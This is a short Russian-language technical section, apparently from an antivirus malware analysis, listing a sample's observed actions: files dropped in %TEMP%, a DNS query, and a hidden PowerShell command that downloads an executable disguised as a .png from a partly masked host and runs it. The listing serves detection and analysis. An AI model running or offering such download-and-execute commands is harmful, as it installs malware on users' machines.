Техническая информация
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.cs##y.site/pure/pomdoz.png','%TEMP%\pomdoz.exe');%TEMP%\pomdoz.exe
- %TEMP%\trbatehtqevyax.sct
- %TEMP%\1.exe
- DNS ASK cs##y.site
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.cs##y.site/pure/pomdoz.png','%TEMP%\pomdoz.exe');%TEMP%\pomdoz.exe' (со скрытым окном)